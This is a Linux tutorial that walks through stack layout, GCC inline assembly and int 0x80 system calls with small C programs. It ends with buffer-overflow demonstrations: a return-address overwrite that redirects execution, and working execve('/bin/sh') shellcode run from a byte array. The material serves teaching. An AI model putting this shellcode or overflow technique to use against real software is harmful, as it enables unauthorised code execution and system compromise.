Stack Management – Buffer Overflow
- Linux
|
Security is one of the
fastest-growing areas in information technology management. Denial Of Service,
Buffer Overflows, Email viruses etc have become general terms in today's info
world. There may not be a single computer user world over who has not been hit
by these and many more attacks. Therefore, recently a lot of emphasis is laid
on securing the computer systems from intruders and viruses as the effects of
these attacks can be so drastic and thus irreparable.
In our papers, we will look
at demystifying these grave attacks, from the coder's point of view. Our belief
is that to understand these attacks, one needs to be in the shoes of the
hackers/crackers. And mind you, every hacker/cracker is a born programmer. We
start with the assumption that you are well-versed with the basics of the C
programming language. Nevertheless, we will re-revise some basic concepts and
simultaneously learn assembler too. We can go on and on but we'd rather take a
break and start hacking.
We start our journey with
the vulnerability of buffer overflow
Buffer overflow technically
means an overflow of the buffer. Every program is allocated some space or given
buffer area in which it can write. A Buffer overflow occurs when the program
spills over this buffer or tries to write in the area it is not supposed to.
This allows an intruder to overwrite the existing instruction in that area,
thereupon gaining full control over the system. However, before we understand
the mechanism of this attack, we need to be well versed with memory management,
a few concepts of stack and heap memory area.
Stack Memory
The programs given below
give an analysis of memory allocations when a program is loaded.
a1.c
main()
{
abc(1,2);
pqr(3,4);
xyz(5,6);
abc(7,8);
}
abc(int i, int j)
{
printf("%p %p
abc\n",&i,&j);
}
pqr(int x, int y)
{
printf("%p %p
pqr\n",&x,&y);
}
xyz(int i, int j)
{
printf("%p %p
xyz\n",&i,&j);
}
gcc -o a1 a1.c
./a1
Output
0xbffff900 0xbffff904 abc
0xbffff900 0xbffff904 pqr
0xbffff900 0xbffff904 xyz
0xbffff900 0xbffff904 abc
The above program at first
glance may seem simplistic, but it is our first cut at learning internals. We
are calling three functions abc, pqr and xyz with two parameters each. The two
parameters in functions abc and xyz are named as i and j and for function pqr,
the name is changed to x and y.
The program simply displays
the addresses of parameters in each function. What is noteworthy here is that
all functions display the same addresses for their parameters. Thus, it can be
safely stated that the parameters to each function begin at the same place in
memory. As in, for function abc, parameters i and j have been allocated the
same memory locations as that of p and q for function pqr.
Thus, memory allocated for
parameters of function is always the same for every function. Meaning to say,
that there is no permanent memory allocated for function parameters.
a1.c
main()
{
abc();
pqr();
xyz();
abc();
}
abc()
{
int i,j;
printf("%p %p
abc\n",&i,&j);
}
pqr()
{
int k,l;
printf("%p %p
pqr\n",&k,&l);
}
xyz()
{
int i,j;
printf("%p %p
xyz\n",&i,&j);
}
Output
0xbfffe004 0xbfffe000 abc
0xbfffe004 0xbfffe000 pqr
0xbfffe004 0xbfffe000 xyz
0xbfffe004 0xbfffe000 abc
The next example is a slightly
modified version. The functions abc, pqr and xyz have remained the same but
they do not accept parameters anymore. Instead, variables are created within
these functions. Nevertheless, like before, all the printf's display identical
addresses. This simply reassures the belief that local variables in a function
are allocated the same address each time a function is called.
The technicality here is
that when a function exits out, all the memory allocated to it is given to the
next function to be called. Thus, functions are given volatile memory, as in,
the memory allocated to it is reused by another function. Also, variable names
have no meaning; it is the addresses assigned to these variables that hold
value.
a1.c
main()
{
abc(1,2);
pqr(3,4);
xyz(5,6);
abc(7,8);
}
abc(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p
i=%p j=%p abc\n",&i1, &j1 , &i,&j);
}
pqr(int k1 , int l1)
{
int k,l;
printf("k1=%p l1=%p
k=%p l=%p pqr\n",&k1, &l1 , &k,&l);
}
xyz(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p
i=%p j=%p xyz\n",&i1, &j1 , &i,&j);
}
Output
i1=0xbfffe180 j1=0xbfffe184
i=0xbfffe174 j=0xbfffe170 abc
k1=0xbfffe180 l1=0xbfffe184
k=0xbfffe174 l=0xbfffe170 pqr
i1=0xbfffe180 j1=0xbfffe184
i=0xbfffe174 j=0xbfffe170 xyz
i1=0xbfffe180 j1=0xbfffe184
i=0xbfffe174 j=0xbfffe170 abc
This program is a merger of
the above two programs. The functions names are the same but now, not only do
they accept two parameters, the function further creates two local variables on
the stack. Printing out the addresses of the local variables and the parameters
bring no surprises at all. They all remain the same for every function.
A detailed version follows.
The value of 1 and 2 given
to function abc are passed on to parameters i1 and j1. These parameters to
functions take up some area in memory, which is called the stack. The internals
of stack memory will be explained in just a short while.
The parameters that are
passed to a function are placed on the stack in the reverse order, therefore
first 2 goes on this stack memory and then 1.
For sake of understanding,
lets take the actual values, where the stack begins at memory location
0xbfffe188. The value 2 is pushed or copied at this memory location thus moving
the stack pointer to 0xbfffe184 and giving this address to j1, followed by 1
which is four memory locations away, i.e 0xbfffe180. This is very much proved
by the program output, which show the same address locations for parameters i1
and j1.
Once the values are placed
on the stack, the function code is executed. This function, abc, creates two
local variables i and j. These are created at positions 0xbfffe174 and
0xbfffe170 as per the output. This goes to prove that besides parameters, local
variables also use up the stack memory. The difference of 12 bytes between the
parameters and variables is given to function call. We know why but hang on, one concept at a time.
Now when the function quits
out, the stack resets back to its original position of 0xbfffe188. A sure indication
that someone moves the current memory pointer/the stack pointer up by 24 bytes.
And, the same process is repeated for all function calls.
a1.c
main()
{
abc(1,2);
}
abc(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p
i=%p j=%p abc\n",&i1, &j1 , &i,&j);
pqr(3,4);
}
pqr(int k1 , int l1)
{
int k,l;
printf("k1=%p l1=%p
k=%p l=%p pqr\n",&k1, &l1 , &k,&l);
xyz(5,6);
aaa(8,9);
}
xyz(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p
i=%p j=%p xyz\n",&i1, &j1 , &i,&j);
}
aaa(int i1, int j1)
{
int i,j;
printf("i1=%p j1=%p
i=%p j=%p aaa\n",&i1, &j1 , &i,&j);
}
Output
i1=0xbfffe300 j1=0xbfffe304
i=0xbfffe2f4 j=0xbfffe2f0 abc
k1=0xbfffe2e0 l1=0xbfffe2e4
k=0xbfffe2d4 l=0xbfffe2d0 pqr
i1=0xbfffe2c0 j1=0xbfffe2c4
i=0xbfffe2b4 j=0xbfffe2b0 xyz
i1=0xbfffe2c0 j1=0xbfffe2c4
i=0xbfffe2b4 j=0xbfffe2b0 aaa
The above program reinforces
the same principles that parameters and local variables are created on the
stack.
The entry point function
main calls function abc. The stack memory now starts at memory 0xbfffe308, the
variables i and j are created at the memory locations 0xbfffe2f4 and 0xbfffe2f0
respectively. There is a gap of 12 bytes as seen before.
At this point, the stack
pointer is positioned at 0xbfffe2e8. When function pqr is called from within
abc, the parameters 4 and 3 are pushed on the stack. This is in the reverse
order, therefore first 4 goes on the stack at 0xbfffe2e4 and then 3 at
0xbfffe2e0. These become the addresses of parameters k1 and l1 respectively.
The call then allocates 12 bytes on the stack for itself, thus giving the
variables k and l the address of 0xbfffe2d4 and 0xbfffe2d0 respectively.
The next two function-call
of xyz and aaa both give the same values. For the call of function xyz with
function pqr, the stack is now at 0xbfffe2c8. The parameters 5 and 6 are pushed
at address location 0xbfffe2c4 and 0xbfffe2c0 respectively. The variables i and
j then are allocated after moving 12 away, thus end up at locations 0xbfffe2b4
and 0xbfffe2b0. When this function ends, the system moves the stack up the same
amount that it moved down. Therefore, the stack at the end of the call of xyz
will come to location 0xbfffe2c8.
The call of the aaa function
follows the same process, thus bringing the stack back to 0xbfffe2c8 in the
end. And the same goes for function pqr. As a result, at the end of each
function, the stack moves back to where it was before the function is called.
This theory can be tried out
with as many functions, but eventually, each will see the stack return to the
same position it started. These functions in turn may call as many functions as
well, however the same rules apply. At the end of a function call, the stack
moves up as much as it had moved down. Each one cleans up its own mess.
a1.c
main()
{
int i,j;
i = 2;
j = 3;
printf("Address of i=%p
j=%p\n",&i,&j);
abc(i,j);
printf("i=%d\n",i);
}
int abc(int x, int y)
{
int *z;
printf("Address of z=%p
x=%p y=%p\n",&z,&x,&y);
z = &y;
printf("z=%p\n",z);
z++;z++;z++;z++;
printf("z=%p\n",z);
*z = 8;
}
Output
Address of i=0xbffff594
j=0xbffff590
Address of z=0xbffff574
x=0xbffff580 y=0xbffff584
z=0xbffff584
z=0xbffff594
i=8
This last example on stack
shows how dangerous stack manipulation can get. The function main is the first function
to be called and in all other aspects, it behaves in a similar manner like the
other functions when dealing with stack memory. The local variables i and j in
main are also created on the stack at 0xbffff594 and 0xbffff590.
The call to function abc
will place the values 3 and 2 on the stack at locations 0xbffff580 and
0xbffff584 before taking up 12 bytes for itself. The parameters x and y are at
the above addresses. The pointer variable z is stored at location 0xbffff574.
This variable is initialized to address of parameter y, which is a value of
0xbffff584. Thereafter, z is incremented by 16, hence its new value is
0xbffff594. But, if you remember, this is the address occupied by variable i.
Further, using the features
of pointers, a value of 8 is written to this location, thereupon actually
changing the value of variable i. This is the power of pointers. One pointer
variable, if it wants can overwrite the value of a variable in another function
indirectly. Since, all local data is stored on the stack, it is susceptible to
being overwritten. Therefore, call
someone else's function with care.
Assembler code in C programs
The next series of programs
explain assembler programming. We believe that every programmer in the world
should understand assembler. Unfortunately, our view is not held by the
majority. It does not matter which language you use to write your code in, when
it finally executes, it will be assembler code and not your favorite language
code that executes. We are not suggesting that you write your code in
assembler, all that we are saying is using assembler helps in understand the
internals of computing better.
A microprocessor or a
computer is made up of entities or memory called registers. These registers are
the basic building blocks that any assembler programmer works with and they are
given names like eax, ebx etc.
Whenever we encounter the
return instruction in C like 'return 100', two things happen. One, the value
100 is placed in the eax register and two, the function ends thus control goes
back to the function that called it. It is assumed here that any value returned
by the called function will be found in the eax register.
a1.c
main()
{
int i;
i=abc();
printf(%d\n,i);
}
int abc()
{
return 100;
}
main()
{
int i;
i = abc();
printf("%d\n",i);
}
int abc()
{
__asm("mov
$100,%eax");
}
Output
100
The gcc compiler allows us
to call assembler code from C. You are also allowed to acess varibales defined in
C in Assembler. The assembler syntax looks like a function call and requires
the assembler instuction as a string. The most common assembler instruction is
called mov. It requires two opearnds or parameters. The fisrt is the source and
the second is the destination. As we want to move a number 100 in the eax
register, our source is the number 100. All numbers must be prefaced by a $
sign.
We remind you once again,
that a register is a named area in a microprocessor and all registers begin
with a % sign. The assembler syntax was invented by AT&T, however if you
are from the windows world or the nasm world, the
syntax is the other way
around, i.e. mov destination, source.
The above program simulates
the return instruction by simply placing a value in a register. The most common
instruction is the mov instruction, which normally makes up over 25% of any
assembler program.
To place the assembler
instruction in a C program, we enclose the instructions within the keyword
__asm with the normal brackets. In the above program the instruction set is
placed in function abc. When the function executes, it simply moves/copies the
value 100 in the eax register and then quits.
Coming back to function
main, the value placed in the eax register is given to variable i. Thus, there
is no way that the program knows or cares whether it is the return statement or
a manual insertion of a value in the eax register that has done the job.
a1.c
main()
{
__asm("pushl
$10");
__asm("pushl
$20");
abc();
}
int abc(int i , int j)
{
printf("%d %d\n",
i , j);
}
Output
20 10
The instruction pushl pushes
the values on the stack. Windows uses the push instruction instead.
a1.c
main()
{
__asm("pushl
$10");
__asm("pushl
$20");
abc();
abc();
}
int abc(int i , int j)
{
printf("%d %d\n", i
, j);
}
Output
20 10
20 10
The next series of programs
show how a function call in C is converted to assembler code. When there is a
call to a function, first, the parameters get pushed on the stack in the
reverse order. In assembler, it is the pushl instruction that is used to push
anything on the stack.
As a result, a call to abc
function in C which is abc(20,10); will first push 10 on the stack using the
push 10 instruction, which is then followed by the push 20 instruction .
Thereafter the abc function
is called in the normal C way but with no parameters.
Function abc is oblivious to
the number of parameters it gets called with. All that it assumes is that it is
called with the parameters present on the stack. It displays their values and
then returns to main. However, an error results. This is because the stack is
not restored back to where it should be. We moved it down 12 bytes while
supplying parameters, so once the function call ends, it has to be restored
back.
The next program repairs
this glitch.
a1.c
main()
{
__asm("pushl
$10");
__asm("pushl
$20");
abc();
__asm("addl
$8,%esp");
abc();
}
int abc(int i , int j)
{
printf("%d %d\n",
i , j);
}
Output
20 10
1108544020 1073828704
The program amends the error
by adding 8 to the stack pointer using the esp register. It is the esp register
which decides where the stack starts in memory. If its value is 100, the stack
is said to start at memory location 100. With every push instruction, the stack
moves down 4 bytes or goes 4 less.
The addl instruction takes
the incremental value first and then the register as the second parameter.
Since the stack is restored back to its original position as before the
function call, no errors are seen anymore.
a1.c
main()
{
printf("esp=%x\n",esp());
__asm("pushl
$10");
printf("esp=%x\n",esp());
__asm("pushl
$20");
printf("esp=%x\n",esp());
abc();
printf("esp=%x\n",esp());
__asm("addl
$8,%esp");
printf("esp=%x\n",esp());
}
int abc(int i , int j)
{
printf("%d %d\n",
i , j);
}
int esp()
{
__asm("movl
%esp,%eax");
}
Output
esp=bfffdd78
esp=bfffdd74
esp=bfffdd70
20 10
esp=bfffdd70
esp=bfffdd78
The above program shows a
newly added function called esp. This function simply copies the value in the
esp register to eax. This means that the return value of the function is now
the stack position. As a result, before the first push, the stack position is
seen at bfffdd78 and after the push 10 instruction, the stack shows a value of
bfffdd74 which is 4 less. Thus the stack has moved down 4 bytes.
The second push 20
instruction moves the stack further down to bfffdd70. When function abc ends,
the stack is at the same position of bfffdd70, which is what it was before the
function call. These numbers re-confirm our explanation.
a1.c
int abc(int i , int j)
{
printf("%d %d\n",
i , j);
}
main()
{
__asm("pushl $10
pushl $20
call abc
addl $8,%esp
");
}
Output
20 10
All assembly instruction are
placed in one asm block,it is allowed but depreciated. A function call in C has
its equivalent in assembler; it is the call instruction. This instruction only
requires the actual physical address of the function to be called. In this
program, instead of giving the address of the function, we have given it the
function name. The system internally replaces the name of the function with its
address.
The only rationale in
placing the function abc before main is that the compiler reads the entire file
only once. It is a single pass one, therefore it does not reread the c file.
Hence, it needs all function names to be created first before they can be used.
a1.c
int abc(int i , int j)
{
printf("%d %d\n",
i , j);
}
main()
{
printf("%p\n",abc);
}
Output
0x8048328
The name of a function in C represents
the address of the function. Therefore, the address of abc function when
displayed shows 0x8048328(on our machine).
a1.c
int abc(int i , int j)
{
printf("%d %d\n",
i , j);
}
main()
{
__asm("pushl $10
pushl $20
call 0x8048328
addl $8,%esp
");
}
Output
20 10
Once we know the address of
function abc as 0x8048328, we place this value in the eax register. The call
instruction is then given the address or the function name through this eax
register.
For the call instruction, the
value given to it is where it assumes some program resides. Hence, it starts
treating the bytes at that location as program code and starts executing them.
Just for your information, it is the job of the compiler/linker to replace
function names with actual addresses.
a1.c
int abc(int i , int j)
{
printf("%d %d\n",
i , j);
}
main()
{
__asm("pushl $10
pushl $20
movl $0x8048328,%eax
call *%eax
call %eax
addl $8,%esp
");
}
Output
20 10
The call instruction can be
take a register as an operand. Though it is optional using a * along with it,
both of them cannot be used together in one program.
a1.c
main()
{
int p = 6;
int q = 7;
printf("p=%p
q=%p\n",&p,&q);
abc(3,4);
pqr();
}
int abc(int i , int j)
{
int x = 1;
int y = 2;
printf("i=%p
j=%p\n",&i,&j);
printf("x=%p
y=%p\n",&x,&y);
printf("abc %x %x %x %x
%x %x %x\n");
}
int pqr()
{
printf("pqr %x %x %x %x
%x %x %x\n");
}
Output
p=0xbfffee94 q=0xbfffee90
i=0xbfffee80 j=0xbfffee84
x=0xbfffee74 y=0xbfffee70
abc bfffee74 bfffee70
42015554 2 1 bfffee98 804836a
pqr 1 bfffee98 804836a 3 4
bfffee98 8048372
a1.c
main()
{
abc(10,20);
}
abc(int i , int j)
{
int p = 100;
int q = 200;
printf("i=%p j=%p p=%p
q=%p\n",&i,&j,&p,&q);
__asm("movl
$4,-4(%ebp)");
__asm("movl $3,-8(%ebp)");
__asm("movl
$2,8(%ebp)");
__asm("movl
$1,12(%ebp)");
printf("p=%d q=%d i=%d
j=%d\n",p,q,i,j);
}
Output
i=0xbffff380 j=0xbffff384
p=0xbffff374 q=0xbffff370
p=4 q=3 i=2 j=1
The round brackets stand for
a * or indirection. The is equivalent to a square bracket [] in the windows
assembler syntax.
a1.c
main()
{
char *argv[2] =
{"/bin/sh",0};
execve("/bin/sh",argv,0);
printf("Bye\n");
}
To execute a program, we use
the execve function. The first parameter is the name of the program, in this
case it is the bourne shell sh.The second is an array of pointers to chars or
argv and the third argument is an array of pointers to the environment block.
This function hands over the control to the shell thus ignoring the remaining
statements in the file. As a result, the last printf does not get executed. As
always, the exit command at the shell prompt quits out of the shell just
created.
a1.c
main()
{
asm("nop");
}
The nop instruction does
nothing at all but yet is very useful for us.
a1.c
main()
{
printf("Main
%p\n",main);
__asm("pushl
$0x8048328");
__asm("ret");
}
//pause
main()
{
__asm("mov
$29,%eax");
__asm("int
$0x80");
printf("Bye\n");
}
In the Windows world, code
is always called from a dll or shared library. In Linux and Unix system calls are
made.For this purpose, values are put in
registers and an interrupt is generated. For examply, when a key is
pressed on the keyboard, the keyboard generates interrupt 9.Calling an
interrupt is demand immediate attention from the microprocessor so that it can
perform the task.
The above programs aims at
calling interrupt 80h. However, prior to that values have be placed in the
registers, which in our case is the eax register. These values are predecided
and inform the OS of the task that needs to be performed. A value of 29
indicates a pause.
First, the value of 29 is
moved in the eax register and then interrupt 80
is called using the int
instruction. The program when executed comes to an abrupt halt unless Crtl-D is
pressed. The string bye does not get displayed.
a1.c
//exit
main()
{
__asm("mov
$1,%eax");
__asm("mov
$4,%ebx");
__asm("int
$0x80");
printf("Bye\n");
}
To quit out of a program,
the exit function is frequently used. This internally is through the interrupt
80 with the vlaues of 1 in the eax register. The number 4 in the ebx register
is basically returned to the operating system and it can be any number for that
matter. The above program mimics the function call. Thus, once again the bye
does not get displayed.
a1.c
main()
{
printf("%d\n",getpid());
__asm("mov
$2,%eax");
__asm("int
$0x80");
printf("%d..\n",getpid());
}
Output
10313
10314..
10313..
Every program when loaded in
memory gets a unique number or process id (pid) by which it is know by to the OS.
The function getpid returns this process id. In our case our programs pid is
10313. The fork function creates one more process or a child in memory. For
this, the fork function puts 2 in the eax register and calls int 80. As a
result, the last printf gets called twice, once for the parent and one for the
child. In both cases, we are printing the pid and the output clearly shows that
the child has been given a new pid of 10314.
a1.c
int i;
main()
{
asm("movl $20,
%eax");
asm("int $0x80");
asm("movl %eax,i");
printf("Hi %d
%d\n",i,getpid());
}
Output
Hi 15415 15415
Moving 20 in the eax
register and calling int 80 is what the getpid
function is all about. The
result of this interrupt is placed in the eax register. In the program, the
value in the eax register is moved into variable i which is then printed out.
We are allowed to use C variables directly in assembler code. Along with i, the
getpid function is used again to prove that the values are the same.
a1.c
main()
{
asm("int $0x80" :
: "a"(2));
printf("Hi\n");
}
Output
Hi
Hi
There is a shorter form to
the int 80 instruction. For this the instruction starts with int 0x80 followed
by two colons. After the colons are placed the names of the registers in double
inverted commas along with the values that go in them in round brackets. As a
result, the value 2 in the above
program gets placed in the eax register and int 80 is called. This is similar
to the fork call. The printf function thus gets displayed twice.
a1.c
main()
{
int i;
printf("pid=%d ppid=%d\n",getpid(),getppid());
asm("int $0x80" :
"=a" (i) : "a" (2));
printf("Hi i=%d pid=%d
ppid=%d\n",i,getpid(),getppid());
}
Output
pid=15445 ppid=15111
Hi i=0 pid=15446 ppid=15445
Hi i=15446 pid=15445
ppid=15111
The getppid function
displays the parents process id which in our case is that of the shell 15111.
Our programs pid is 15445. The int 80 instruction has a =a within the two
colons which signifies that after int 80 is generated, the return value in the
eax register must be placed in the varible specified in round brackets. Thus
whatever is after the first colon is for return values, the second colon is for
values to be placed in registers.
a1.c
main()
{
kill(1066,9);
}
The ps -e instruction gives
a list of programs with their process ids. The kill function sends a signal to
the running process. The first parameter is always the process id, 1066 and the
second is the signal no, 9 to be sent. A signal of 9 terminates a program.
a1.c
main()
{
asm("int $0x80" :
: "a" (37),"b" (1066), "c" (9));
}
In assembler, the function
is represented by a value of 37 in the eax register, the pid in the ebx
register and the signal 9 in the ecx register.
//mkdir vmci
a1.c
main()
{
char *p = "vmci";
asm("int $0x80" :
: "a" (39), "b" (p));
}
The value 39 creates a sub
directory. Here, the register ebx holds the the name of the directory to be
created, which in our case is represented by pointer p.
a1.c
main()
{
char *p =
"hel\nlo";
asm("int $0x80" :
: "a" (4) , "b" (1) , "c" (p) , "d"
(5));
}
Output
hel
l
The printf function finally
calls the write system call. This is by
placing 4 in the eax
register. The file handle to write to, in our case 1 is standard output in ebx,
ecx the string to write and edx the number of characters to write 5. Thus the
Hel and \n and one more l gets written on screen. The last o is ignored.
a1.c
main()
{
abc();
}
int abc()
{
char a[3];
strcpy(a,"AAAAAAAAAAAAAAAAAAAAAAAABBBBCDEF");
}
There is not one way to skin a cat. This program takes a different
approach to overwrite the return address. As the array a is the first and only
variable, a few bytes above it is placed the return address. The strcpy
function does no bounds checking on the size of the array, thus it overwrites
the return address with the characters in the array.
a1.c
main()
{
abc();
}
int abc()
{
char a[3];
a[24]='B';
a[25]='B';
a[26]='B';
a[27]='B';
a[28]='C';
a[29]='D';
a[30]='E';
a[31]='F';
}
This is one more program to ascertain
the fact that the array is not restricted to the size it is initialized to.
Since a is merely a pointer to a location in memory, using the array syntax,
the other areas in memory can easily be accessed. While doing some research on
this topic we found out that the gcc compiler adds enough code to ensure a
secure environment. Thus the return address is found at location 28,29,30,31.
z.c
#include <stdio.h>
main()
{
FILE *fp; int i;
fp =
fopen("q10.txt","w");
for ( i = 0 ; i<= 7 ;
i++)
fputc('A',fp);
fputc('B',fp);
fputc('B',fp);
fputc('B',fp);
fputc('B',fp);
fputc('C',fp);
fputc('D',fp);
fputc('E',fp);
fputc('F',fp);
}
A file called q10.txt is
opened for writing. Using the function fputc, which takes a character and the
file pointer, 8 A’s are written on to disk using the for loop. Thereafter, a
few more characters are written individually to the file.
z1.c
#include <stdio.h>
main()
{
FILE *fp;char a[4];
fp =
fopen("q10.txt","r");
fread(a,100,1,fp);
}
The above program is a sequel to the previous
one. It opens the file q10.txt and then reads the next 100 bytes into an array
a. However, since the array is only 4 bytes large only 4 bytes are allocated to
the array. Thus the first 4 A’s will be saved in the allocated array memory and
thereafter it overwrites the stack area with the other characters. The fread function in one go places all these bytes on
the stack without realizing that it is overwriting the existing instruction
thus causing a buffer overflow.
>export VIJAY=`perl -e
'print "A" x 200'`
a1.c
main()
{
char *p;
p =
getenv("VIJAY");
printf("%s\n",p);
}
Output
lots of A's
a1.c
main()
{
char *p;char a[64];
p =
getenv("VIJAY");
strcpy(a,p);
}
This program shows
Segmentation fault since the registers have been overwritten.
a1.c
int pqr()
{
printf("In
pqr\n\n");
exit(1);
}
main()
{
printf("pqr=%p\n",pqr);
abc();
}
int abc()
{
char a[3];
a[24]='B';
a[25]='B';
a[26]='B';
a[27]='B';
a[28]=0x5c;
a[29]=0x83;
a[30]=0x04;
a[31]=0x08;
}
Output
pqr=0x804835c
In pqr
Disassembled output
>gdb a1
x/12b 0x8048338
0xb8 0x01
0x00 0x00 0x00
0xcd 0x80
Before calling function abc
in main, we run the program as is to find out the address of function pqr. On
our machine the address is 0x804835c. This value is then given in abc to the
memory location 28,29,30,31. As seen in the earlier program, these location
stores the return address of the code to be called when main ends. Now that it
has been overwritten by the address of function pqr, pqr is called and hence we
see the printf displaying In pqr.
The pqr function having exit
has been shown in the disassembled form using the gdb debugger. Here 1 is moved
in the eax register and then interrupt 80 is called.
a1.c
main()
{
__asm("mov
$1,%eax");
__asm("int
$0x80");
printf("Bye\n");
}
The disassembled output of
this program shows the assembler instruction for the exit function. These
instructions are then placed into an array in the next program.
a1.c
char p[] =
"\xb8\x01\x00\x00\x00\xcd\x80";
main()
{
char (*q)();
q = p;
printf("Hi\n");
q();
printf("Bye\n");
}
Output
Hi
The array p holds the
assembler instruction for the exit function. Q is now a pointer to function and
is initialized to array p. On executing the program, the printf function displays
Hi. Thereafter, code at address location q is executed. Since this code
represents the exit function, the program terminates without displaying Bye.
a1.c
char p[] =
"\xeb\x1d" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /*
movb %al, 0x07(%esi) */
"\x89\x46\x0c" /*
movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /*
movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /*
leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /*
leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff"
/*call start*/
"/bin/sh";
main()
{
char (*q)();
q = p;
q();
}
This program works on the
same principles and creates a shell.